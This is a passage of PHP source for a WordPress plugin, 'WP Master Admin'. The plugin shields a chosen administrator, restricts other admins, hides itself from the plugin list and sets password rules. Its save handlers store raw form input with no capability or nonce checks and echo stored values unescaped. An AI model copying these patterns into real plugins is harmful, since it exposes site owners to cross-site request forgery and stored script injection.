<?php
/*
Plugin Name: WP Master Admin
Plugin URI: http://www.wpmasteradmin.com
Description: Protects the selected administrator from the change or delete by other Admins & limits the capabilities of other Admins in order to protect the Master Admin and the website from malicious attacks or disasters caused by inexperienced Admins.
Version: 2.6.3
Author: WPMasterAdmin.com
Author URI: http://www.wpmasteradmin.com
*/

/**
* Plugin main class
**/
class Master_Admin {
    var $plugin_dir;
    var $plugin_url;
    var $text_domain = 'master-admin';

    /**
     * PHP 5 constructor
     **/
    function __construct() {

        //setup proper directories
        if ( is_multisite() && defined( 'WPMU_PLUGIN_URL' ) && defined( 'WPMU_PLUGIN_DIR' ) && file_exists( WPMU_PLUGIN_DIR . '/wp-master-admin.php' ) ) {
            $this->plugin_dir = WPMU_PLUGIN_DIR . '/wp-master-admin/';
            $this->plugin_url = WPMU_PLUGIN_URL . '/wp-master-admin/';
        } else if ( defined( 'WP_PLUGIN_URL' ) && defined( 'WP_PLUGIN_DIR' ) && file_exists( WP_PLUGIN_DIR . '/wp-master-admin/wp-master-admin.php' ) ) {
            $this->plugin_dir = WP_PLUGIN_DIR . '/wp-master-admin/';
            $this->plugin_url = WP_PLUGIN_URL . '/wp-master-admin/';
        } else if ( defined('WP_PLUGIN_URL' ) && defined( 'WP_PLUGIN_DIR' ) && file_exists( WP_PLUGIN_DIR . '/wp-master-admin.php' ) ) {
            $this->plugin_dir = WP_PLUGIN_DIR;
            $this->plugin_url = WP_PLUGIN_URL;
        } else {
            wp_die( __( 'There was an issue determining where Admin Protect plugin is installed. Please reinstall.', $this->text_domain ) );
        }

        //inlude language
        load_plugin_textdomain( $this->text_domain, false, $this->plugin_dir . '/languages' );


        add_action( 'admin_init', array( &$this, 'save_email_templates' ) );

		add_action( 'admin_init', array( &$this, 'save_password_settings' ) );

        //save protected admin id
        add_action( 'admin_init', array( &$this, 'save_protected_admin' ) );

        //deny edit this plugin
        add_action( 'admin_init', array( &$this, 'deny_edit_plugin' ) );

		//initialize jquery and thickbox scripts
		add_action( 'admin_enqueue_scripts', array( &$this,'scripts') );

		add_action('admin_init', array( &$this, 'ap_custom_trigger_check'));

        //deny install plugins
        add_action( 'set_current_user', array( &$this, 'close_access_install_plugins' ) );

        //add field to settings form
        /*if ( false != strpos( $_SERVER['SCRIPT_NAME'], 'wp-admin/options-general.php' ) ) {
            add_action( 'admin_head', array( &$this, 'add_assign_fields' ) );
        }*/

		//add new admin menu
		add_action('admin_menu', array(&$this,'protectMenu'));

        //protection from changes
        add_action( 'edit_user_profile_update', array( &$this, 'protected_update' ) );
        //protection from delete
        add_action( 'delete_user', array( &$this, 'protected_delete' ) );
        //delete action buttons for protected admin
        add_action( 'user_row_actions', array( &$this, 'delete_user_actions' ), 99, 2 );

        //remove link for deactivate the plugin
        add_filter( 'all_plugins', array( &$this, 'remove_plugin' ), 99 );

        add_action( 'admin_init', array( &$this, 'deny_wp_update' ) );
		add_action( 'admin_init', array( &$this, 'deny_wp_settings' ) );

        add_filter( 'user_has_cap', array( &$this, 'remove_change_role_cap' ), 10, 3 );

        add_action( 'user_edit_form_tag', array( &$this, 'include_pass_script' ) );
        add_action( 'user_edit_form_tag', array( &$this, 'use_generate_password' ) );

        add_action( 'user_new_form_tag', array( &$this, 'include_pass_script' ) );
        add_action( 'user_new_form_tag', array( &$this, 'use_generate_password' ) );

        add_action( 'login_footer', array( &$this, 'include_pass_script' ) );

        add_filter( 'random_password', array( &$this, 'generate_password' ) );
        add_action( 'validate_password_reset', array( &$this, 'use_generate_password' ) );
        add_action( 'edit_user_profile_update', array( &$this, 'use_generate_password' ) );
    }

    function use_generate_password() {
        global $use_generate_password;
        $use_generate_password = true;
    }

    function generate_password( $password ) {
        global $use_generate_password;
        if ( $use_generate_password || ( defined( 'DOING_AJAX' ) && DOING_AJAX && $_REQUEST['action'] == 'generate-password' )  ) {
            $settings = $this->_get_settings();
            $settings = $settings['password_secity'];
            $min_length = ( isset( $settings['password_minimal_length'] ) && (int)$settings['password_minimal_length'] >= 10 ) ? (int)$settings['password_minimal_length'] : 10;

            if( isset( $settings['password_black_list'] ) && !empty( $settings['password_black_list'] ) ) {
                $black_list = explode( "\n", str_replace( array( "\n\r", "\r\n", "\r" ), "\n", $settings['password_black_list'] ) );
            } else {
                $black_list = array();
            }

            $j = 0;
            while ( $j < 1000 ) {
                $j++;

                $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
                $chars .= '!@#$%^&*()';
                $chars .= '-_[]{}<>~`+=,.;:/?|';

                $password = '';
                for ( $i = 0; $i < $min_length; $i++ ) {
                    $password .= substr($chars, wp_rand(0, strlen($chars) - 1), 1);
                }

                if( in_array( $password, $black_list ) ) continue;

                if( isset( $settings['password_mixed_case'] ) && $settings['password_mixed_case'] == 'yes' &&
                    ( strtolower( $password ) == $password || strtoupper( $password ) == $password ) )
                    continue;

                if( isset( $settings['password_numeric_digits'] ) && $settings['password_numeric_digits'] == 'yes' &&
                    !preg_match( "/\d/", $password ) )
                    continue;

                if( isset( $settings['password_special_chars'] ) && $settings['password_special_chars'] == 'yes' &&
                    !preg_match( "/[^a-zA-Z0-9 ]/", $password ) )
                    continue;

                break;
            }
            $use_generate_password = false ;
            return $password;
        }
        return $password;
    }

    function include_pass_script() {
        $settings = $this->_get_settings();
        $settings = $settings['password_secity'];

        wp_enqueue_script( 'pass_protect', plugin_dir_url( __FILE__ ) . 'password_protect.js', array(), '1.0', true );

        wp_localize_script( 'pass_protect', 'ma_text_var', array( 'pwsL10n' => array(
            'empty' => __( "Strength Indicator" ),
            'short' => __( "Too Short" ),
            'weak' => __( "Very Weak" ),
            'bad' => __( "Weak" ),
            'good' => __( "Medium" ),
            'strong' => __( "Strong" ),
            'mismatch' => __( "Password Mismatch" ),
            'mixed_case' => __( "Needs Mixed Case" ),
            'numbers' => __( "Needs Numbers" ),
            'special_chars' => __( "Needs Special Chars" ),
            'blacklist' => __( "Password in Blacklist" )
        ) ) );



        if( isset( $settings['password_black_list'] ) && !empty( $settings['password_black_list'] ) ) {
            $black_list = explode( "\n", str_replace( array( "\n\r", "\r\n", "\r" ), "\n", $settings['password_black_list'] ) );
        } else {
            $black_list = array();
        }

        $min_length = ( isset( $settings['password_minimal_length'] ) && is_numeric( $settings['password_minimal_length'] ) && $settings['password_minimal_length'] > 0 ) ? $settings['password_minimal_length'] : 1;
        $hint_message = __( 'Hint - The password' ) . ':<br />';
        if( $min_length > 1 ) {
            $hint_message .= '<span class="ma_requirement_min_length">- ' . sprintf( __( 'Should be at least %d characters long.' ), $min_length ) . '</span><br />';
        }

        $strength = ( isset( $settings['password_strength'] ) && is_numeric( $settings['password_strength'] ) ) ? $settings['password_strength'] : 5;
        switch( $strength ) {
            case '2':
                $hint_message .= '<span class="ma_requirement_level">- ' . sprintf( __( 'Must trigger the %s level on the Strength indicator.' ), __('Weak' ) ) . '</span><br />';
                break;
            case '3':
                $hint_message .= '<span class="ma_requirement_level">- ' . sprintf( __( 'Must trigger the %s level on the Strength indicator.' ), _x('Medium', 'password strength') ) . '</span><br />';
                break;
            case '4':
                $hint_message .= '<span class="ma_requirement_level">- ' . sprintf( __( 'Must trigger the %s level on the Strength indicator.' ), __('Strong' ) ) . '</span><br />';
                break;
            default:
                $hint_message .= '<span class="ma_requirement_level">- ' . sprintf( __( 'Must trigger the %s level on the Strength indicator.' ), __('Very weak' ) ) . '</span><br />';
                break;
        }

        $mixed_case = !empty( $settings['password_mixed_case'] ) ? $settings['password_mixed_case'] : 'no';
        if( 'yes' == $mixed_case ) {
            $hint_message .= '<span class="ma_requirement_mixed_case">- ' . __( 'Should contain upper and lower case letters.' ) . '</span><br />';
        }

        $numeric_digits = !empty( $settings['password_numeric_digits'] ) ? $settings['password_numeric_digits'] : 'no';
        if( 'yes' == $numeric_digits ) {
            $hint_message .= '<span class="ma_requirement_numeric_digits">- ' . __( 'Should contain numbers.' ) . '</span><br />';
        }

        $special_chars = !empty( $settings['password_special_chars'] ) ? $settings['password_special_chars'] : 'no';
        if( 'yes' == $special_chars ) {
            $hint_message .= '<span class="ma_requirement_special_chars">- ' . __( 'Should contain special characters like ! " ? $ % ^ & ).' ) . '</span><br />';
        }

        wp_localize_script( 'pass_protect', 'ma_password_protect', array(
            'blackList' => $black_list,
            'min_length' => $min_length,
            'strength' => $strength,
            'mixed_case' => $mixed_case,
            'numeric_digits' => $numeric_digits,
            'special_chars' => $special_chars,
            'hint_message' => $hint_message,
            'ajax_url' => get_admin_url() . 'admin-ajax.php'
        ));
    }

    function deny_wp_settings() {
        global $parent_file;
        $settings = $this->_get_settings();
        if ( !empty( $settings['protected'] ) && ! in_array( get_current_user_id(), $settings['protected'] )  &&
             isset( $settings['access']['m_opts'] ) && '1' ==  $settings['access']['m_opts'] &&
             'options-general.php' == $parent_file ) {
             wp_die('You don\'t have permission to this page');
        }
    }

    function remove_change_role_cap( $def_caps, $caps, $args ) {
        if( isset( $args[0] ) && 'promote_user' == $args[0] ) {
            $settings = $this->_get_settings();
            if( isset( $args[2] ) && !empty( $settings['protected'] ) && in_array( $args[2], $settings['protected'] ) ) {
                $def_caps['promote_users'] = '';
            }
        }
        return $def_caps;
    }



	function deny_wp_update() {
		$settings = $this->_get_settings();
		if ( empty( $settings['protected'] ) || in_array( get_current_user_id(), $settings['protected'] ) || 1 > $settings['protected'] ) {
			//add_filter( 'pre_site_transient_update_core', create_function( '$a', "return null;" ) );
		}
		else {
			if(isset($settings['access']['prevent_update_wp']) && $settings['access']['prevent_update_wp'] == 1) {
				remove_submenu_page( 'index.php','update-core.php' ) 	;
				add_action( 'init', create_function( '$a', "remove_action( 'init', 'wp_version_check' );" ), 2 );
                add_filter( 'pre_option_update_core', create_function( '$a', "return null;" ) );

                # 2.8 to 3.0:
                remove_action( 'wp_version_check', 'wp_version_check' );
                remove_action( 'admin_init', '_maybe_update_core' );
                add_filter( 'pre_transient_update_core', create_function( '$a', "return null;" ) );

                # 3.0:
                add_filter( 'pre_site_transient_update_core', create_function( '$a', "return null;" ) );
			}
		}
	}

	/**
     * Show admin protect menu in admin sidebar
	 **/
	function protectMenu() {
        global $menu;
		$settings = $this->_get_settings();

		if ( empty( $settings['protected'] ) || in_array( get_current_user_id(), $settings['protected'] ) || 1 > $settings['protected'] ) {
			add_menu_page( 'Settings', 'Master Admin', 'manage_options', 'admin_protect', array(&$this,'add_assign_fields'));
			add_submenu_page( 'admin_protect', 'Email Template', 'Email Template', 'manage_options', 'email_template', array( &$this, 'email_template' ) );
            add_submenu_page( 'admin_protect', 'Password Security', 'Password Security', 'manage_options', 'password_security', array( &$this, 'security_template' ) );
		} else {
            if ( isset( $settings['access']['m_opts'] ) && '1' ==  $settings['access']['m_opts'] ) {
                foreach( $menu as $k=>$m ) {
                    if( $m[2] == 'options-general.php' ) {
                        unset( $menu[ $k ] );
                    }
                }
            }
        }
	}

	/**
     * Email template page
	 **/
	function email_template() {
		$contents = $this->_get_settings();
		?>

        <style type="text/css">
			#activate, #deactivate, #activated, #deactivated {display:none; margin-top:15px;}
			#activate_content, #deactivate_content, #activated_content, #deactivated_content { height:200px;}
			.wp-editor-area{height:300px !important;}
			.wp_themeSkin iframe { height:300px !important;}
			input[type="text"]{width:250px;}
		</style>

        <script type="text/javascript">
		jQuery(function(){
			jQuery('#select_template').change(function(){
				jQuery('#activate').hide();
				jQuery('#deactivate').hide();
				jQuery('#activated').hide();
				jQuery('#deactivated').hide();
				jQuery('#'+jQuery(this).val()).show();
			});
		});
		</script>

		<div class="wrap">

        	<form method="post" action="">
                <input type="hidden" name="option_page" value="general">
                <input type="hidden" name="action" value="update">

                <table width="100%">
                    <tr>
                        <td colspan="2"><h2><?php _e( 'Edit Email Template', $this->text_domain );?></h2></td>
                    </tr>
                    <tr>
                    	<td colspan="2">
                        <table class="wp-list-table widefat fixed posts">
                            <thead>
                                <tr>
                                    <th><?php _e( 'Select template:', $this->text_domain );?>
                                    <select id="select_template" name="select_template">
                                    	<option value="select"><?php _e( '-- Choose one --', $this->text_domain );?></option>
                                    	<option value="activate" <?php if(isset($_POST['select_template'])) echo ($_POST['select_template'] == 'activate')?'selected="selected"':'';?>><?php _e( 'Request Activation Mail Template', $this->text_domain );?></option>
                                        <option value="deactivate" <?php if(isset($_POST['select_template'])) echo ($_POST['select_template'] == 'deactivate')?'selected="selected"':'';?>><?php _e( 'Request Deactivation Mail Template', $this->text_domain );?></option>
                                        <option value="activated" <?php if(isset($_POST['select_template'])) echo ($_POST['select_template'] == 'activated')?'selected="selected"':'';?>><?php _e( 'Request Activated Mail Template', $this->text_domain );?></option>
                                        <option value="deactivated" <?php if(isset($_POST['select_template'])) echo ($_POST['select_template'] == 'deactivated')?'selected="selected"':'';?>><?php _e( 'Request Deactivated Mail Template', $this->text_domain );?></option>
                                    </select>
                                    </th>
                                </tr>
                            </thead>
                        </table>
                        </td>
                    </tr>
                    <tr>
                        <td style="padding-right:20px;">

                        <div id="activate" <?php if(isset($_POST['select_template'])) { echo ($_POST['select_template'] == 'activate')?'style="display:block;"':''; } ?>>

                        <strong><?php _e( 'Request Activation Mail Template', $this->text_domain );?></strong><br /> <br />

                        <?php
                        $request_activation_name =  isset($contents['request_activation_name'])?$contents['request_activation_name']:'';
						$request_activation_email =  isset($contents['request_activation_email'])?$contents['request_activation_email']:'';
						$request_activation_subject =  isset($contents['request_activation_subject'])?$contents['request_activation_subject']:'';
						?>

                        <table>
                        	<tr>
                            	<td><b><?php _e( 'Master Admin Name:', $this->text_domain );?></b></td>
                                <td><input type="text" name="request_activation_name" value="<?php echo $request_activation_name;?>" /></td>
                            </tr>
                            <tr>
                            	<td><b><?php _e( 'Master Admin Email:', $this->text_domain );?></b></td>
                                <td><input type="text" name="request_activation_email" value="<?php echo $request_activation_email;?>" /></td>
                            </tr>
                            <tr>
                            	<td><b><?php _e( 'Subject:', $this->text_domain );?></b></td>
                                <td><input type="text" name="request_activation_subject" value="<?php echo $request_activation_subject;?>" /></td>
                            </tr>
                        </table>
						<?php
						$activate_content = isset($contents['activate_content'])?$contents['activate_content']:'';
						if($activate_content == '')
							$activate_content = 'Hello! , <br /><br />%%admin_name%% has requested for activation of %%plugin_name%%<br /><br/>%%link%%';
						?>
						<?php /*?><textarea name="activate_content"><?php echo $activate_content?></textarea><?php */?>
						<?php
						wp_editor( stripslashes($activate_content), 'activate_content', $settings = array('textarea_name' => 'activate_content') );
						?>
                        </div>

                        <div id="deactivate" <?php if(isset($_POST['select_template'])) { echo ($_POST['select_template'] == 'deactivate')?'style="display:block;"':''; }?>>

                        <strong><?php _e( 'Request Deactivation Mail Template', $this->text_domain );?></strong><br /><br />

                        <?php
                        $request_deactivation_name =  isset($contents['request_deactivation_name'])?$contents['request_deactivation_name']:'';
						$request_deactivation_email =  isset($contents['request_deactivation_email'])?$contents['request_deactivation_email']:'';
						$request_deactivation_subject =  isset($contents['request_deactivation_subject'])?$contents['request_deactivation_subject']:'';
						?>

                        <table>
                        	<tr>
                            	<td><b><?php _e( 'Master Admin Name:', $this->text_domain );?></b></td>
                                <td><input type="text" name="request_deactivation_name" value="<?php echo $request_deactivation_name;?>" /></td>
                            </tr>
                            <tr>
                            	<td><b><?php _e( 'Master Admin Email:', $this->text_domain );?></b></td>
                                <td><input type="text" name="request_deactivation_email" value="<?php echo $request_deactivation_email;?>" /></td>
                            </tr>
                            <tr>
                            	<td><b><?php _e( 'Subject:', $this->text_domain );?></b></td>
                                <td><input type="text" name="request_deactivation_subject" value="<?php echo $request_deactivation_subject;?>" /></td>
                            </tr>
                        </table>
						<?php
						$deactivate_content = isset($contents['deactivate_content'])?$contents['deactivate_content']:'';
						if($deactivate_content == '')
							$deactivate_content = 'Hello! , <br /><br />%%admin_name%% has requested for deactivation of %%plugin_name%% <br /><br /> The reason for deactivation is as follows: %%reason%% <br /><br /> %%link%%';
						?>
						<?php /*?><textarea name="deactivate_content"><?php echo $deactivate_content?></textarea><?php */?>
						<?php
						wp_editor( stripslashes($deactivate_content), 'deactivate_content', $settings = array('textarea_name' => 'deactivate_content') );
						?>
                        </div>

                      	<div id="activated" <?php if(isset($_POST['select_template'])) {echo ($_POST['select_template'] == 'activated')?'style="display:block;"':''; }?>>

                        <strong><?php _e( 'Activated Mail Template', $this->text_domain );?></strong><br /><br />

                        <?php
                        $activated_name = isset($contents['activated_name'])?$contents['activated_name']:'';
						$activated_email = isset($contents['activated_email'])?$contents['activated_email']:'';
						$activated_subject = isset($contents['activated_subject'])?$contents['activated_subject']:'';
						?>

                        <table>
                        	<tr>
                            	<td><b><?php _e( 'Master Admin Name:', $this->text_domain );?></b></td>
                                <td><input type="text" name="activated_name" value="<?php echo $activated_name;?>" /></td>
                            </tr>
                            <tr>
                            	<td><b><?php _e( 'Master Admin Email:', $this->text_domain );?></b></td>
                                <td><input type="text" name="activated_email" value="<?php echo $activated_email;?>" /></td>
                            </tr>
                            <tr>
                            	<td><b><?php _e( 'Subject:', $this->text_domain );?>Subject:</b></td>
                                <td><input type="text" name="activated_subject" value="<?php echo $activated_subject;?>" /></td>
                            </tr>
                        </table>

						<?php

						$activated_content = isset($contents['activated_content'])?$contents['activated_content']:'';
						if($activated_content == '')
							$activated_content = 'Hello %%admin_name%%! , <br /><br /> your requested for activation of %%plugin_name%% has been approved';
						?>
						<?php /*?><textarea name="activated_content"><?php echo $activated_content?></textarea><?php */?>
						<?php
						wp_editor( stripslashes($activated_content), 'activated_content', $settings = array('textarea_name' => 'activated_content') );
						?>
                        </div>

                        <div id="deactivated" <?php if(isset($_POST['select_template'])) { echo ($_POST['select_template'] == 'deactivated')?'style="display:block;"':''; } ?>>

                        <strong><?php _e( 'Deactivated Mail Template', $this->text_domain );?></strong><br /><br />

                        <?php
                        $deactivated_name = isset($contents['deactivated_name'])?$contents['deactivated_name']:'';
						$deactivated_email = isset($contents['deactivated_email'])?$contents['deactivated_email']:'';
						$deactivated_subject = isset($contents['deactivated_subject'])?$contents['deactivated_subject']:'';
						?>

                        <table>
                        	<tr>
                            	<td><b><?php _e( 'Master Admin Name:', $this->text_domain );?></b></td>
                                <td><input type="text" name="deactivated_name" value="<?php echo $deactivated_name;?>" /></td>
                            </tr>
                            <tr>
                            	<td><b><?php _e( 'Master Admin Email:', $this->text_domain );?></b></td>
                                <td><input type="text" name="deactivated_email" value="<?php echo $deactivated_email;?>" /></td>
                            </tr>
                            <tr>
                            	<td><b><?php _e( 'Subject:', $this->text_domain );?></b></td>
                                <td><input type="text" name="deactivated_subject" value="<?php echo $deactivated_subject;?>" /></td>
                            </tr>
                        </table>

						<?php
						$deactivated_content = isset($contents['deactivated_content'])?$contents['deactivated_content']:'';
						if($deactivated_content == '')
							$deactivated_content = 'Hello %%admin_name%%! , <br /><br /> your requested for deactivation of %%plugin_name%% has been approved';
						?>
						<?php /*?><textarea name="deactivated_content"><?php echo $deactivated_content?></textarea><?php */?>
						<?php
						wp_editor( stripslashes($deactivated_content), 'deactivated_content', $settings = array('textarea_name' => 'deactivated_content') );
						?>
                        </div>

                      </td>
                    </tr>
                    <tr>
                    	<td>
                        <table class="wp-list-table widefat fixed posts" style="width:60%;">
                        	<tr>
                            	<th colspan="2"><?php _e( 'Placeholders:', $this->text_domain );?></th>
                            </tr>
                            <tr>
                            	<td style="width: 200px;"><?php _e( '%%admin_name%%', $this->text_domain );?></td>
                                <td style="width: 75%;"><?php _e( 'Name of the admin requesting for activation/deactivation', $this->text_domain );?></td>
                            </tr>
                            <tr>
                            	<td><?php _e( '%%plugin_name%%', $this->text_domain );?></td>
                                <td><?php _e( 'Name of the plugin requested for activation/deactivation', $this->text_domain );?></td>
                            </tr>
                            <tr>
                            	<td><?php _e( '%%reason%%', $this->text_domain );?></td>
                                <td><?php _e( 'Reason for activation/deactivation of the plugin', $this->text_domain );?></td>
                            </tr>
                            <tr>
                            	<td><?php _e( '%%link%%', $this->text_domain );?></td>
                                <td><?php _e( 'Link sent in the email for activation/deactivation confirmation', $this->text_domain );?></td>
                            </tr>
                        </table>
                        </td>
                    </tr>
                    <tr>
                        <td colspan="2"><input type="submit" name="templateSubmitBtn" value="<?php _e( 'Submit Changes', $this->text_domain );?>" class="button-primary"></td>
                    </tr>
                </table>
            </form>
        </div>
		<?php
	}

	function save_email_templates() {
        if ( isset( $_POST['templateSubmitBtn'] ) ) {
            $settings = $this->_get_settings();
            if($_POST['select_template'] == 'activate')
                $settings['activate_content'] = $_POST['activate_content'];
            if($_POST['select_template'] == 'deactivate'){
                $settings['deactivate_content'] = $_POST['deactivate_content'];}
            if($_POST['select_template'] == 'activated')
                $settings['activated_content'] = $_POST['activated_content'];
            if($_POST['select_template'] == 'deactivated')
                $settings['deactivated_content'] = $_POST['deactivated_content'];

            $settings['request_activation_name'] = $_POST['request_activation_name'];
            $settings['request_activation_email'] = $_POST['request_activation_email'];
            $settings['request_activation_subject'] = $_POST['request_activation_subject'];

            $settings['request_deactivation_name'] = $_POST['request_deactivation_name'];
            $settings['request_deactivation_email'] = $_POST['request_deactivation_email'];
            $settings['request_deactivation_subject'] = $_POST['request_deactivation_subject'];

            $settings['activated_name'] = $_POST['activated_name'];
            $settings['activated_email'] = $_POST['activated_email'];
            $settings['activated_subject'] = $_POST['activated_subject'];

            $settings['deactivated_name'] = $_POST['deactivated_name'];
            $settings['deactivated_email'] = $_POST['deactivated_email'];
            $settings['deactivated_subject'] = $_POST['deactivated_subject'];

            $this->_save_settings( $settings );
        }
    }

    /**
     * Security template page
     **/
    function security_template() {
        $settings = $this->_get_settings();
        $pass_settings = $settings['password_secity'];
        ?>
        <div>
            <form action="" method="post">
                <table class="form-table">
                    <tbody>
                    <tr>
                        <td colspan="2">
                            <h2>Password Requirements</h2>
                        </td>
                    </tr>
                    <tr>
                        <th>
                            <label for="ma_settings_password_minimal_length">Minimum Length</label>
                        </th>
                        <td>
                            <input type="text" id="ma_settings_password_minimal_length"
                                   name="ma_security[password_minimal_length]"
                                   value="<?php echo $pass_settings['password_minimal_length']; ?>">
                        </td>
                    </tr>
                    <tr>
                        <th>
                            <label for="ma_settings_password_strength">Strength</label>
                        </th>
                        <td>
                            <select id="ma_settings_password_strength" name="ma_security[password_strength]">
                                <option value="5" <?php selected( $pass_settings['password_strength'], 5 ); ?>>Very Weak</option>
                                <option value="2" <?php selected( $pass_settings['password_strength'], 2 ); ?>>Weak</option>
                                <option value="3" <?php selected( $pass_settings['password_strength'], 3 ); ?>>Medium</option>
                                <option value="4" <?php selected( $pass_settings['password_strength'], 4 ); ?>>High</option>
                            </select>
                        </td>
                    </tr>
                    <tr>
                        <th>
                            <label for="ma_settings_password_black_list">Black List</label>
                        </th>
                        <td>
                            <textarea id="ma_settings_password_black_list" name="ma_security[password_black_list]" rows="6"><?php echo $pass_settings['password_black_list']; ?></textarea>
                            <br>
                            <span class="description">Enter passwords (one per line) here to prevent users from choosing them</span>
                        </td>
                    </tr>
                    <tr>
                        <th>
                            <label for="ma_settings_password_mixed_case">Mixed Cases</label>
                        </th>
                        <td>
                            <label>
                                <input type="hidden" name="ma_security[password_mixed_case]" value="no">
                                <input type="checkbox" name="ma_security[password_mixed_case]" value="yes" <?php checked( $pass_settings['password_mixed_case'], 'yes' ); ?>>
                                Password must contain a mixture of uppercase and lowercase characters
                            </label>
                        </td>
                    </tr>
                    <tr>
                        <th>
                            <label for="ma_settings_password_numeric_digits">Digits</label>
                        </th>
                        <td>
                            <label>
                                <input type="hidden" id="ma_settings_password_numeric_digits_hidden" name="ma_security[password_numeric_digits]" value="no">
                                <input type="checkbox" id="ma_settings_password_numeric_digits" name="ma_security[password_numeric_digits]" value="yes" <?php checked( $pass_settings['password_numeric_digits'], 'yes' ); ?>>
                                Password must contain digits (0-9)
                            </label>
                        </td>
                    </tr>
                    <tr>
                        <th>
                            <label for="ma_settings_password_special_chars">Special Characters</label>
                        </th>
                        <td>
                            <label>
                                <input type="hidden" id="ma_settings_password_special_chars_hidden" name="ma_security[password_special_chars]" value="no">
                                <input type="checkbox" id="ma_settings_password_special_chars" name="ma_security[password_special_chars]" value="yes" <?php checked( $pass_settings['password_special_chars'], 'yes' ); ?>>
                                Password must contain special characters (eg: .,!#$%_+)
                            </label>
                        </td>
                    </tr>
                    </tbody>
                </table>

                <input type="submit" name="passwordSubmitBtn" value="<?php _e( 'Submit Changes', $this->text_domain );?>" class="button-primary">
            </form>
        </div>
        <?php
    }

    function save_password_settings() {
        if ( isset( $_POST['passwordSubmitBtn'] ) ) {
            $settings = $this->_get_settings();

            $settings['password_secity'] = $_POST['ma_security'];

            $this->_save_settings( $settings );
        }
    }

    /**
     * Save protected admin id
     **/
    function save_protected_admin() {

		if ( isset( $_POST['submitBtn'] )) {
                $settings = $this->_get_settings();
                if ( empty( $settings['protected'] ) || 0 == $settings['protected'] || in_array( get_current_user_id(), $settings['protected'] )  ) {

                    if ( isset( $_POST['protected_admin'] ) ) {
                        $settings['protected'] = $_POST['protected_admin'];
                    }

					$settings['thickbox_html_content'] = $_POST['thickbox_html_content'];
					$settings['thickbox_activation_content'] = $_POST['thickbox_activation_content'];

                    //update options
                    $settings['access'] = array(
                        'prevent_update_wp' => ( isset( $_POST['ap_prevent_update_wp'] ) && 1 == $_POST['ap_prevent_update_wp'] ) ? '1' : '0',
						'request' => ( isset( $_POST['ap_request'] ) && 1 == $_POST['ap_request'] ) ? '1' : '0',
						'act_pl' => ( isset( $_POST['ap_deny_activate_plugins'] ) && 1 == $_POST['ap_deny_activate_plugins'] ) ? '1' : '0',
                        'ins_pl' => ( isset( $_POST['ap_deny_install_plugins'] ) && 1 == $_POST['ap_deny_install_plugins'] ) ? '1' : '0',
                        'm_opts' => ( isset( $_POST['ap_deny_manage_options'] ) && 1 == $_POST['ap_deny_manage_options'] ) ? '1' : '0',
                        'edt_pl' => ( isset( $_POST['ap_deny_edit_plugins'] ) && 1 == $_POST['ap_deny_edit_plugins'] ) ? '1' : '0',
                        'upd_pl' => ( isset( $_POST['ap_deny_update_plugins'] ) && 1 == $_POST['ap_deny_update_plugins'] ) ? '1' : '0',
                        'del_pl' => ( isset( $_POST['ap_deny_delete_plugins'] ) && 1 == $_POST['ap_deny_delete_plugins'] ) ? '1' : '0',
                        'swt_th' => ( isset( $_POST['ap_deny_switch_themes'] ) && 1 == $_POST['ap_deny_switch_themes'] ) ? '1' : '0',
                        'ins_th' => ( isset( $_POST['ap_deny_install_themes'] ) && 1 == $_POST['ap_deny_install_themes'] ) ? '1' : '0',
                        'edt_th' => ( isset( $_POST['ap_deny_edit_themes'] ) && 1 == $_POST['ap_deny_edit_themes'] ) ? '1' : '0',
                        'del_th' => ( isset( $_POST['ap_deny_delete_themes'] ) && 1 == $_POST['ap_deny_delete_themes'] ) ? '1' : '0',
                    );

                    $this->_save_settings( $settings );

                }

            }
    }

	function ap_custom_trigger_check() {
		if( isset( $_GET['ap_custom_trigger'] ) && $_GET['ap_custom_trigger'] == 'activate_request' ) {
			include_once('activate_request.php');
			exit;
			//$this->activate();
		}

		if( isset( $_GET['ap_custom_trigger'] ) && $_GET['ap_custom_trigger'] == 'deactivate_request' ) {
			include_once('deactivate_request.php');
			exit;
		} elseif ( isset( $_GET['ap_custom_trigger'] ) && $_GET['ap_custom_trigger'] == 'activated') {
			include_once('activated.php');
			exit;
		} elseif ( isset( $_GET['ap_custom_trigger'] ) && $_GET['ap_custom_trigger'] == 'deactivated') {
			include_once('deactivated.php');
			exit;
		}
	}


    /**
     * Deny edit this plugin
     **/
    function deny_edit_plugin() {

        if ( false != strpos( $_SERVER['SCRIPT_NAME'], 'wp-admin/plugin-editor.php' ) ) {

            $settings = $this->_get_settings();
            if ( !empty( $settings['protected'] ) && !in_array( get_current_user_id(), $settings['protected'] ) && 0 != $settings['protected'] ) {
                $plugins = get_plugins();

                if ( !empty($plugins) ) {
                    if ( isset($_REQUEST['plugin']) )
                        $plugin = stripslashes($_REQUEST['plugin']);
                    elseif ( isset($_REQUEST['file']) ) {
                        $plugin = stripslashes($_REQUEST['file']);
                    }

                    $plugins = array_keys($plugins);

                    if ( empty($plugin) ) {
                        $plugin = $plugins[0];
                    }


                    if ( 'wp-master-admin/wp-master-admin.php' == $plugin ) {
                        if ( empty($plugins[1]) )
                            wp_die( __('There are no plugins installed on this site.') );

                        wp_redirect( self_admin_url("plugin-editor.php?file=".$plugins[1]) );
                        exit;
                    }

                }
            }
        }
    }


    /**
     * Deny install plugins
     **/
    function close_access_install_plugins() {
        $settings = $this->_get_settings();

        if ( !empty( $settings['protected'] ) && 0 != $settings['protected'] ) {
            if ( in_array( get_current_user_id(), $settings['protected'] ) ) {
                //for protected admin
                $i = 1;
            } else {
                //for all admins

                //deny edit plugin
                $GLOBALS['current_user']->allcaps['edit-plugin-test_wp-master-admin/wp-master-admin.php'] = false;
                $GLOBALS['current_user']->allcaps['edit-plugin_wp-master-admin/wp-master-admin.php'] = false;

				if(isset($_GET['plugin']))
					$plugin = $_GET['plugin'];
				else
					$plugin = '';


                //deny activate plugins
                if ( isset(  $settings['access']['act_pl'] ) && '1' == $settings['access']['act_pl'] ) {
                    $GLOBALS['current_user']->allcaps['activate_plugins'] = false;
					register_activation_hook( $plugin, array( $this,'activate' ) );
					add_filter( 'plugin_action_links', array($this,'disable_plugin_activation'), 10, 4 );
				}
				if ( isset(  $settings['access']['request'] ) && '1' == $settings['access']['request'] ) {

					register_activation_hook( $plugin, array( $this,'activate' ) );
					add_filter( 'plugin_action_links', array($this,'disable_plugin_activation'), 10, 4 );

					//Filter for adding Deactivation link for thickbox
				add_filter( 'plugin_action_links', array($this,'disable_plugin_deactivation'), 10, 4 );
				}

                //deny install plugins
                if ( isset(  $settings['access']['ins_pl'] ) && '1' ==  $settings['access']['ins_pl'] )
